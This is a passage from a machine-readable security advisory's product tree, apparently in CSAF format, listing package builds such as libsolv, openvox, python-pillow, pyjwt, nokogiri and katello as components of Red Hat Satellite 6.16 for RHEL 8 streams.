"product_id": "8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch"
},
"product_reference": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-1:0.7.20-7.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src"
},
"product_reference": "libsolv-1:0.7.20-7.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src"
},
"product_reference": "openvox-agent-0:8.24.1-3.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64"
},
"product_reference": "openvox-agent-0:8.24.1-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch"
},
"product_reference": "openvox-server-0:8.14.1-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src"
},
"product_reference": "openvox-server-0:8.14.1-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-0:12.3.0-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src"
},
"product_reference": "python-pillow-0:12.3.0-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pulp-container-0:2.20.10-2.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src"
},
"product_reference": "python-pulp-container-0:2.20.10-2.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyjwt-0:2.13.0-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src"
},
"product_reference": "python-pyjwt-0:2.13.0-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pysequoia-0:0.1.33-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src"
},
"product_reference": "python-pysequoia-0:0.1.33-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-solv-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "python3-solv-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch"
},
"product_reference": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch"
},
"product_reference": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch"
},
"product_reference": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64"
},
"product_reference": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-capsule-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-capsule-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-common-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-common-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-maintenance"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-maintenance"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16-utils"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-cli-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-cli-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16-utils"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch"
},
"product_reference": "foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-1:0.7.20-7.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src"
},
"product_reference": "libsolv-1:0.7.20-7.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src"
},
"product_reference": "openvox-agent-0:8.24.1-3.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64"
},
"product_reference": "openvox-agent-0:8.24.1-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch"
},
"product_reference": "openvox-server-0:8.14.1-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src"
},
"product_reference": "openvox-server-0:8.14.1-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-0:12.3.0-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src"
},
"product_reference": "python-pillow-0:12.3.0-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pulp-container-0:2.20.10-2.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src"
},
"product_reference": "python-pulp-container-0:2.20.10-2.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyjwt-0:2.13.0-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src"
},
"product_reference": "python-pyjwt-0:2.13.0-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pysequoia-0:0.1.33-1.el8pc.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src"
},
"product_reference": "python-pysequoia-0:0.1.33-1.el8pc.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-solv-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "python3-solv-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64"
},
"product_reference": "python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch"
},
"product_reference": "python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch"
},
"product_reference": "python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch"
},
"product_reference": "python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64"
},
"product_reference": "python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64"
},
"product_reference": "ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch"
},
"product_reference": "rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-katello-0:4.14.0.21-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src"
},
"product_reference": "rubygem-katello-0:4.14.0.21-1.el8sat.src",
